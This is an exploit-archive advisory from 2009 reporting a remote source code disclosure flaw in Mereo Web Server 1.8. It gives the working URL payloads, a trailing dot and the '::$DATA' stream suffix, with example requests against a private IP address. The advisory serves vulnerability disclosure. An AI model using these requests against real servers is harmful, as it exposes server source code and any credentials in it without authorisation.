Mereo Web Server 1.8 Remote Source Code Disclosure

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mereo Web Server 1.8 Remote Source Code Disclosure
# Published : 2009-09-25
# Author : Dr_IDE
# Previous Title : PHP <=5.3 - preg_match() full path disclosure
# Next Title : CDBurnerXP 4.2.4.1351

#################################################################################
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By:		Dr_IDE
# Tested On:	Windows XPSP3
#
#################################################################################

- Description -

Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest version of
the application available. 

Mereo is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][.]
	http://[ webserver IP]/[ file ][::$DATA]
	
	http://172.16.2.101/index.html.
	http://172.16.2.101/index.html::$DATA